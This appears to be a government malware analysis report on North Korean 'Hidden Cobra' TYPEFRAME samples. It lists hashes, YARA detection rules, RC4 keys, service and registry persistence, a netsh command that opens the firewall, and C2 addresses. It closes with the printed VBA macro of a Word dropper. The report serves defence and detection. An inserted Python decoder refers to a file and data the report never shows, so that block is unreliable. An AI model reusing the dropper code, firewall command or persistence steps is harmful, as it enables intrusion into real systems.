675a35e04b... Contains e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7
Description

This file is a 32-bit Windows executable designed to install a proxy module as a service on the victim’s system. This file accepts the following arguments during execution: "68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd".

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

Decrypted strings of interest are displayed below:

--Begin strings of interest--
"wmplayer.xml"
"printcache.tlb"
"Print Device Cache"
"Manage Print Device Cache And Printing"
printcache
--End strings of interest--

When executed, it will load an embedded RC4-encrypted archive file starting at offset "0x15000".

The malware decrypts the archive using the same RC4 key. The decrypted archive contains a proxy module, which is decompressed and installed from the existing file name "wmplayer.xml" to "C:\Windows\system32\printcache.tlb".

The malware installs the module as a serviceDLL in the "printcache" service group in order to execute "C:\Windows\system32\printcache.tlb" using the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe".

--Begin service--
ServiceName = "printcache"
DisplayName = "Print Device Cache"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k printcache"
--End service--

The malware contains RC4-encrypted configuration file data, which contains port numbers (8 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7

Tags

proxy, trojan

Details
Name: 60294C426865B38FDE7C5031AFC4E453
Size: 778240 bytes
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5: 60294c426865b38fde7c5031afc4e453
SHA1: f8736e3f89f30f082cfd68a73763afcfb0e1c9c3
SHA256: e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7
SHA512: fe96fa2f127a3a71a9edc89268567188f8c585ea8356feb9a2c46224dc7022b3d751848424df745b517e7a1e123c566b6feb094653281026ffd2e9ce81d5a7a1
ssdeep: 12288:8iwDMd29KJgSWD8QfEbsjlqxlsiAen1XQ1pV+jPAt:8WghEbvhAeC1pIDAt
Entropy: 6.714021
Antivirus
Ahnlab: Trojan/Win32.Agent
BitDefender: Gen:Variant.Symmi.14589
Emsisoft: Gen:Variant.Symmi.14589 (B)
F-secure: Gen:Variant.Symmi.14589
Microsoft Security Essentials: TrojanProxy:Win32/SilverMob.A!dha
Yara Rules
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }
        $s1 = { B6 DF 01 FD 48 B5 }
        $s2 = { B6 D5 0E F3 4E B5 }
        $s3 = { B7 DF 0E EE }
        $s4 = { B6 DF 03 FC }
        $s5 = { A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-03-02 14:01:47-05:00
Import Hash: 09e63e3d425d6b543de4003f71c2b66d
PE Sections
MD5                               Name    Raw Size  Entropy
1eda6d8dec57fac45afb42a6f27080a0  header  4096      0.767469
4109d939d8532ac1bd9f2cfa81a33905  .text   475136    6.632858
3b24a4913977b402a4dcce1694306cfb  .rdata  147456    5.923542
f597eb4917ef44a2f9a080fc59f528f3  .data   77824     4.968551
77c814f5856057e7a7f6237bbba51a76  .rsrc   32768     7.100017
438ec3064d499d63eb03035aa1f7a142  .reloc  40960     5.759460
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Relationships
e69d6c2d3e... Contained_Within 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1
Description

This file, printcache.tlb (original name: PDll.dll), is a proxy module installed as a service by the file 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1. This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server.

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End Rc4 key--

When executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal encoded port numbers:

--Begin port # list --
BB 01 ==> 1BB ==> 443
7F 00 ==> 7F ==> 127
90 1F ==> 1F90 ==> 8080
--End port # list --

The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections.

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=443 action"
--End firewall modification--

The malware attempts to open ports 443, 127, and 8080 and wait for a connection. The malware contains public SSL certificates in its resource named "101" and is designed to generate crafted TLS sessions (fake TLS communication mechanism).

089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359

Tags

proxy, trojan

Details
Name: midimapper.rs
Size: 761856 bytes
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5: 00b0cfb59b088b247c97c8fed383c115
SHA1: 0cdee734d3a17de0e81b9b2b0b36804d516c3212
SHA256: 089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359
SHA512: 9c9f65e277816a42574ddc28724e1afde8c3bffd0e8bf2e0414204d7b07384848718ada43e59c206b6d13dca33c28c4ae3a82ec12b21207efa5cbb8abfacf7d6
ssdeep: 12288:5XYoUXvfAkdRwowG358mOlVvRaXKgCJpV4DDxazfAF:+zwowHJ46jJp+DmfAF
Entropy: 6.693566
Antivirus
Ahnlab: Trojan/Win32.Agent
BitDefender: Gen:Variant.Symmi.14589
ESET: Win32/NukeSped.AQ trojan
Emsisoft: Gen:Variant.Symmi.14589 (B)
F-secure: Gen:Variant.Symmi.14589
Ikarus: Trojan.Win32.Agentb
K7: Trojan ( 0051e0501 )
Microsoft Security Essentials: TrojanProxy:Win32/SilverMob.A!dha
NANOAV: Trojan.Win32.NukeSped.eylorq
Quick Heal: Genvariant.Symmi
VirusBlokAda: Trojan.Agentb
Zillya!: Trojan.Agentb.Win32.18439
Yara Rules
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }
        $s1 = { B6 DF 01 FD 48 B5 }
        $s2 = { B6 D5 0E F3 4E B5 }
        $s3 = { B7 DF 0E EE }
        $s4 = { B6 DF 03 FC }
        $s5 = { A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches
100 dfb41457088fa2003a085c325bcb63666e1e66fa36bdc8975995bfbeac39500d
PE Metadata
Compile Date: 2016-07-25 03:12:34-04:00
Import Hash: 100f0ee6d217c6b9e15be71a6c42a2d3
PE Sections
MD5                               Name    Raw Size  Entropy
93649845b04705777d78e05982b93e5f  header  4096      0.765196
aca858c8ea569b991797da02f8613716  .text   458752    6.614177
11b9d8a29ef67ebb2c19f753f1c7ada4  .rdata  147456    5.918054
72b7a8f5d846964649b682d6ef074cc0  .data   77824     4.964840
d73a8feca0f13f34575c84df77fbed0e  .rsrc   32768     7.100191
61c29b19fe37db83e42ef9ddf46eb40f  .reloc  40960     5.689934
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Description

midimapper.rs (original name: MDll.dll) is a proxy module installed as a service. This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server.

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End Rc4 key--

When executed, the malware loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal encoded port numbers:

-- Begin port # list --
FB 20 ==> 20FB ==> 8443
-- End port # list --

The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections.

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=8443 action=allow enable=yes"
--End firewall modification--

The malware attempts to open port 8443 and wait for a connection. The malware contains public SSL certificates in its resource named "101". It is designed to generate crafted TLS sessions (fake TLS communication mechanism).

d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92

Tags

proxy, trojan

Details
Name: BF474B8ACD55380B1169BB949D60E9E4
Size: 466241 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: bf474b8acd55380b1169bb949d60e9e4
SHA1: c60c18fc0226a53be15637ee3ef0b73b0dabd854
SHA256: d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92
SHA512: 46995cf3516c160d2f4fa5957c8c67df75f2768b24562b22de46a5d4ef7ba17fecaef2ad900bc6925e0c4284802864361423653154ad0622af18d049fb0419be
ssdeep: 12288:G+3/oi/EpRsV97/8Olq3p8YNk5oYEeLxCStEowZVKmZag:Gmoi/EpRsV9S3prgomLE9oVmQg
Entropy: 7.760001
Antivirus
Microsoft Security Essentials: Trojan:Win32/Autophyte.B!dha
Symantec: Heur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yara
rule enc_PK_header
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
    strings:
        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-06-08 07:12:45-04:00
Import Hash: 225e9f7be86d6676c98a852492458049
PE Sections
MD5                               Name    Raw Size  Entropy
21257d58787390491b672d426714b015  header  4096      0.592724
dff4417e6006f193afa34a31581d52dd  .text   53248     6.423430
5fbeefe580cf5cb5ee032f29c78b5f7b  .rdata  12288     3.435650
c5776014ec07771c8d8093a7af1868c7  .data   16384     2.126011
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
d1d490866d... Contains 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116
Description

This 32-bit Windows executable is a RAT, designed to install a proxy module as a service on the victim’s system.

The malware's APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05
--End Rc4 key--

Decrypted strings of interest are displayed below:

--Begin strings of interest--
"wmplayer.xml"
"printcache.tlb"
"printcache"
"Print Device Cache"
"Manage Print Device Cache And Printing"
--End strings of interest--

When executed, the malware will load an embedded RC4-encrypted archive file starting at offset "0x15000".

The malware decrypts the archive using the same RC4 key. The decrypted archive contains a proxy module, which is decompressed and installed from the existing file name "wmplayer.xml" to "C:\Windows\system32\printcache.tlb".

The malware installs the module as a serviceDLL in the "printcache" service group in order to execute "C:\Windows\system32\printcache.tlb" by the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe".

--Begin service--
ServiceName = "printcache"
DisplayName = "Print Device Cache"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k printcache"
--End service--

The malware contains RC4-encrypted configuration file data, which contains port numbers (8 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Signature"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116

Tags

proxy, trojan

Details
Name: 1printcache.tlb
Name: CA67F84D5A4AC1459934128442C53B03
Size: 778240 bytes
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5: ca67f84d5a4ac1459934128442c53b03
SHA1: f4eb6a50c60320edafb3e48c612c6a55560d0684
SHA256: 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116
SHA512: 4695cf69e2ae52fc94eab31cbc3bb846022a3e1516d9bc293118f674ea1eb86468cff0a4c0dee8dff8a2d545df153116e8d86669513426e1b32a205041339e45
ssdeep: 12288:drrF4D0d2QKPIyWE8QPnWnGHiS2VcL2ZotSNfpV532/dlZ:x6IGnWntQ2ZvfpvmdlZ
Entropy: 6.710797
Antivirus
Ahnlab: Trojan/Win32.Agent
BitDefender: Gen:Variant.Symmi.14589
Emsisoft: Gen:Variant.Symmi.14589 (B)
F-secure: Gen:Variant.Symmi.14589
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-06-08 07:12:35-04:00
Import Hash: 09e63e3d425d6b543de4003f71c2b66d
PE Sections
MD5                               Name    Raw Size  Entropy
5b1f93f0412e9f1c7a7ad42d729b292b  header  4096      0.769911
e6ea312f762f4df521b229a77f186664  .text   475136    6.629464
b6fa7b267ea19010d44f056ec3cca39d  .rdata  147456    5.920344
1076ec3948d21da8d6c5036548880c63  .data   77824     4.972282
77c814f5856057e7a7f6237bbba51a76  .rsrc   32768     7.100017
3184d0afb653bf0723cadccc14d92071  .reloc  40960     5.752155
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Relationships
40ef57ca2a... Contained_Within d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92
Description

1printcache.tlb (original name: PDll.dll) is a proxy module installed as a service by the file d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92. This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server.

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05
--End Rc4 key--

When executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal encoded port numbers:

--Begin port # list --
BB 01 ==> 1BB ==> 443
7F 00 ==> 7F ==> 127
FB 20 ==> 20FB ==> 8443
--End port # list --

The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections.

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=443 action=allow enable=yes"
--End firewall modification--

The malware attempts to open ports 443, 127, and 8443 and wait for a connection. The malware contains public SSL certificates in its resource named "101". It is designed to generate crafted TLS sessions (fake TLS communication mechanism).

546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1

Tags

dropper, trojan

Details
Name: 6AB301FC3296E1CEB140BF5D294894C5
Size: 259584 bytes
Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5: 6ab301fc3296e1ceb140bf5d294894c5
SHA1: 8d62498656db928f987b47bdbcfab5d6032be48a
SHA256: 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1
SHA512: 3abd7a690d821ace78d8f5e2394f0922308963c7ba8ee63661e9cdb2e36fe8353904346b4b0457c6ace3071505533187d62a41d47473a6a9680cab7fca209ceb
ssdeep: 3072:JdHh7xVwMPRTxXX0bqkmvA7XKmJLiSi3Ix1DKXrlTNEsuFFCeojbmUkGVcNP+:17xVrxxn0PrWiv8hLnS+
Entropy: 5.918488
Antivirus
AVG: Agent6.BHRZ.dropper
Ahnlab: Trojan/Win32.Agent
ESET: a variant of Win32/NukeSped.AK trojan
Microsoft Security Essentials: Trojan:Win32/Autophyte.B!dha
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-05-08 11:43:26-04:00
Import Hash: b32c7db2b70ae7b183886924d873c585
PE Sections
MD5                               Name    Raw Size  Entropy
24baa03194bc78f0184ea606128bc80f  header  1024      2.821047
170ce86f9a7ffcd242f3903fafe1f302  .text   57856     6.433615
33b066692952c4534ebf0a56ca293085  .rdata  37888     5.095210
b4eed5366c4254a3c7f6c2f021c29efe  .data   156160    4.916035
3ad7431aaa87a1e6b6400ca9b273d98a  .pdata  4096      4.579212
c23d2715b42b072fcf86b2aa58807b56  .rsrc   512       4.714485
ad711ec082866631d620286bb36fdb72  .reloc  2048      4.752156
Relationships
546dbd370a... Contains 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
Description

This file is a malicious 64-bit Windows dynamic-link library (DLL) that is designed to drop and execute an embedded file. The malware decodes the embedded file by XORing it with the value "0x35".

During analysis, the malware executed the file as C:\Windows\Temp\java.exe (3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210). The dropped file has been identified as a RAT.

3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

Tags

backdoor, remote-access-trojan, trojan

Details
Name: java.exe
Size: 118784 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 77b50bb476a85a7aa30c962a389838aa
SHA1: df466a1f473c7c5eba5f22d90822fd1430b6a244
SHA256: 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
SHA512: 33b78e0bc8832958b79292bfebffe32c03b59b92044bb95331ee384f7061f6724c7d10bcf17ee1395dbd437b225c0813ba4bc5de6ef44f4bdd9ee58e446ad143
ssdeep: 3072:sPhrkoI8QYJRMs4y5pe+/a5sN5t4+PXP:Mi/lqpe+/0sa
Entropy: 5.880053
Antivirus
AVG: Agent6.BHRZ
Ahnlab: Backdoor/Win32.Agent
Avira: TR/Agent.bkecf
BitDefender: Trojan.GenericKD.30623185
Cyren: W32/Trojan.YPCX-1821
ESET: a variant of Win32/NukeSped.AK trojan
Emsisoft: Trojan.GenericKD.30623185 (B)
F-secure: Trojan.GenericKD.30623185
Ikarus: Trojan.Win32.NukeSped
K7: Trojan ( 004fa2411 )
McAfee: Trojan-FNWY!77B50BB476A8
Microsoft Security Essentials: Trojan:Win32/Autophyte.B!dha
NANOAV: Trojan.Win32.NukeSped.fajisv
Quick Heal: Trojan.Cossta
Symantec: Trojan.Gen.MBT
TrendMicro: TROJ_NUKESPED.A
TrendMicro House Call: TROJ_NUKESPED.A
VirusBlokAda: Trojan.Cossta
Zillya!: Trojan.Cossta.Win32.10325
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-04-28 03:28:32-04:00
Import Hash: 85c89bf0449505044219f0be26213402
Company Name: Microsoft Corporation
File Description: ProQuota
Internal Name: proquota
Legal Copyright: Microsoft Corporation. All rights reserved.
Original Filename: proquota.exe.mui
Product Name: Microsoft Windows Operating System
Product Version: 6.1.7600.16385
PE Sections
MD5                               Name    Raw Size  Entropy
81c12eb5fc3cbdd06675cd1097363a40  header  4096      0.689960
2539474aa6202371abd37a4d66031955  .text   86016     6.641666
b97c14b801643b3a61ea28266f3f71b1  .rdata  8192      4.735406
48eb8a67d4fd42ea24da9dc9029cb101  .data   16384     1.857068
c139ac9cb34e0620a10c15e5d42b85d2  .rsrc   4096      1.174962
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
3c809a1010... Contained_Within 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1
3c809a1010... Connected_To 184.107.209.2
3c809a1010... Connected_To 111.207.78.204
3c809a1010... Connected_To 80.91.118.45
3c809a1010... Connected_To 181.119.19.56
Description

This file is a 32-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B
--End Rc4 key--

This file is a RAT and contains the following embedded hexadecimal encoded C2 IP addresses and port numbers:

--Begin IP and port # list--
1BBh ==> 443
2D765B50h ==> 80.91.118.45
381377B5h ==> 181.119.19.56
0CC4ECF6Fh ==> 111.207.78.204
2D16BB8h ==> 184.107.209.2
--End IP and port # list--

When executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to accept instructions from the remote server to perform additional functions:

--Begin functions performed by the malware--
Search for files
Execute process
Terminate processes
Delete files
Execute command using shell
Download and upload files
Read files and write files
--End functions performed by the malware--

The malware is designed to use the same RC4 key to encrypt its configuration file data, which contains the hexadecimal encoded C2 IP address and port number. The encrypted configuration data is stored into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--
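
The configuration encodings quoted in the descriptions above (the port-then-IP record for laxhost.dll, the port lists for the proxy modules, and the DWORD immediates for java.exe) can be decoded as follows. This Python is an added example, not part of the NCCIC report; the record's position at the start of the decrypted registry value, the skipping of zero entries, and the sample encrypted value are assumptions constructed for illustration.

```python
"""Decode configuration values in the encodings the report describes (added example)."""
from __future__ import annotations

import ipaddress
import struct

# RC4 key quoted in the report for laxhost.dll and its installer.
RC4_KEY = bytes.fromhex("85C07C178B4DF48B762033C03BC8770B")


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_c2_record(record: bytes) -> tuple[str, int]:
    """'BB 01 3B 5A 5D 61': little-endian uint16 port, then four IP octets in order."""
    if len(record) < 6:
        raise ValueError("C2 record needs at least 6 bytes")
    (port,) = struct.unpack_from("<H", record, 0)
    return str(ipaddress.IPv4Address(record[2:6])), port


def parse_port_list(blob: bytes) -> list[int]:
    """'BB 01 7F 00 90 1F': consecutive little-endian uint16 ports.

    Zero entries are treated as padding and skipped (assumption).
    """
    if len(blob) % 2:
        raise ValueError("port list must have an even number of bytes")
    return [port for (port,) in struct.iter_unpack("<H", blob) if port]


def dword_to_ip(immediate: str) -> str:
    """'2D765B50h': a disassembler immediate whose in-memory bytes are the IP octets."""
    value = int(immediate.rstrip("hH"), 16)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("immediate does not fit in 32 bits")
    return str(ipaddress.IPv4Address(struct.pack("<I", value)))


def decode_registry_config(value: bytes, key: bytes = RC4_KEY) -> tuple[str, int]:
    """Decrypt a 'Description' registry value and read the C2 record.

    Assumption: the record sits at offset 0 of the decrypted data.
    """
    return parse_c2_record(rc4(key, value))


# Constructed stand-in for the encrypted registry value: only the six plaintext
# bytes shown in the report, encrypted with the reported key.
SAMPLE_REGISTRY_VALUE = rc4(RC4_KEY, bytes.fromhex("BB013B5A5D61"))

# Constructed 8-byte port configuration: the three pairs from the report plus
# two zero bytes of padding.
SAMPLE_PORT_CONFIG = bytes.fromhex("BB017F00901F0000")


if __name__ == "__main__":
    ip, port = decode_registry_config(SAMPLE_REGISTRY_VALUE)
    print(f"C2 from registry value: {ip}:{port}")
    print("Listening ports:", parse_port_list(SAMPLE_PORT_CONFIG))
    for imm in ("2D765B50h", "381377B5h", "0CC4ECF6Fh", "2D16BB8h"):
        print(imm, "=>", dword_to_ip(imm))
```
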

4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd

Tags

downloader, dropper, trojan

Details
Name: 3229A6CEA658B1B3CA5CA9AD7B40D8D4
Size: 712192 bytes
Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 949, Author: ISkyISea, Template: Normal, Last Saved By: ISkyISea, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 17:00, Create Time/Date: Mon Apr 3 18:36:00 2017, Last Saved Time/Date: Thu Apr 6 00:34:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5: 3229a6cea658b1b3ca5ca9ad7b40d8d4
SHA1: 70730e608e2fcc68ce468ed148e965c5bacfb51c
SHA256: 4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd
SHA512: ff385a9446415412950562cca832eab1d17de56932f3633a86202dea829e8bd25e56864306f2e6c8bb7ff7d2cfe2785acc4261410e38348946baf72d4a0696de
ssdeep: 12288:sh+81FiNloAzjMXJ1NPeZ3eMNZtF7fHRRAug0EX7:W1FiNWEYxeV3NfHDe
Entropy: 5.446016
Antivirus
BitDefender: VB:Trojan.Valyria.401
ESET: VBA/TrojanDropper.Agent.YE trojan
Emsisoft: VB:Trojan.Valyria.401 (B)
F-secure: VB:Trojan.Valyria.401
McAfee: W97M/Dropper.dj
Microsoft Security Essentials: TrojanDropper:O97M/SilverMob.A!dha
NANOAV: Trojan.Ole2.Vbs-heuristic.druvzi
Quick Heal: W97M.Downloader.BJS
Sophos: Troj/DocDl-KOR
nProtect: Suspicious/W97M.Obfus.Gen
Yara Rules

No matches found.

ssdeep Matches

No matches found.

Description

This is a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. When the Word document is opened, the user is prompted to enable the use of macros by the Microsoft Word process. If the user enables macro execution, the embedded malicious macro will be executed and proceed to decode a PE binary and execute it from "%TEMP%\leo.exe". A code snippet used to decode the malicious binary is displayed below:

--Begin code snippet--

   On Error GoTo gaqz
   
   liveOn = "mfp/fyf"
   
   liveOff = Environ("temp") + "\"
   For qnx = 1 To Len(liveOn)
       liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
   Next
   
   Dim str(238) As String

   str(1) = "Encoded hex data"
   str(2) = "Encoded hex data"
   str(3) = "Encoded hex data"
   str(4) = "Encoded hex data"
   str(5) = "Encoded hex data"
   .......
   .......
   str(238) = "Encoded hex data"

   Dim offBin(499) As Byte
   str(1) = "Encoded hex data"
   str(2) = "Encoded hex data"
   str(3) = "Encoded hex data"
   ......
   ......
   str(499) = "Encoded hex data"

   Open liveOff For Binary Access Write As #1

   lpdq = 1

   For jnx = 0 To 237
       For inx = 0 To 499
           offBin(inx) = Val("&H" + Mid(str(jnx + 1), inx * 2 + 1, 2))
           offBin(inx) = offBin(inx) Xor 231
       Next inx

       Put #1, lpdq, offBin
       lpdq = lpdq + 500
   Next jnx

   Close #1

   jfsukew liveOff



   liveOn = "tfdvsjuzxbsojoh`mndjsu`514/epd"

   liveOffd = Environ("temp") + "\"
   For qnx = 1 To Len(liveOn)
       liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
   Next qnx

   Dim strd(167) As String
strd(167) = ""

   Dim offBind(499) As Byte

   Open liveOffd For Binary Access Write As #2

   lpdq = 1

   For jnx = 0 To 166
       For inx = 0 To 499
           offBind(inx) = Val("&H" + Mid(strd(jnx + 1), inx * 2 + 1, 2))
           offBind(inx) = offBind(inx) Xor 231
       Next inx

       Put #2, lpdq, offBind
       lpdq = lpdq + 500
   Next jnx
   
   Close #2
   
   SetAttr liveOffd, 6
   
   bazs = ThisDocument.Name
   
   Application.Documents.Open (liveOffd)
   Application.ActiveDocument.ActiveWindow.Caption = bazs
   ThisDocument.Close
   
gaqz:
End Sub

Function Jdhcuad(Input_Str$) As String
   Dim Len_Str%, Result$, Temp_Str$, n%
   
   Len_Str = Len(Input_Str)
   For n = 1 To Len_Str
       Temp_Str = Mid(Input_Str, n, 1)
       Temp_Str = Chr(46 + (Asc(Temp_Str) - 46 - 20 + (122 - 46)) Mod (122 - 46))
       Result = Result + Temp_Str
   Next
   
   Jdhcuad = Result
End Function

Private Sub jfsukew(filename)
   Dim obj As Object
   Set obj = CreateObject(Jdhcuad("kgw:18<Bg0y44"))
   obj.Run filename, 1, False
   Set obj = Nothing
End Sub
--End code snippet--
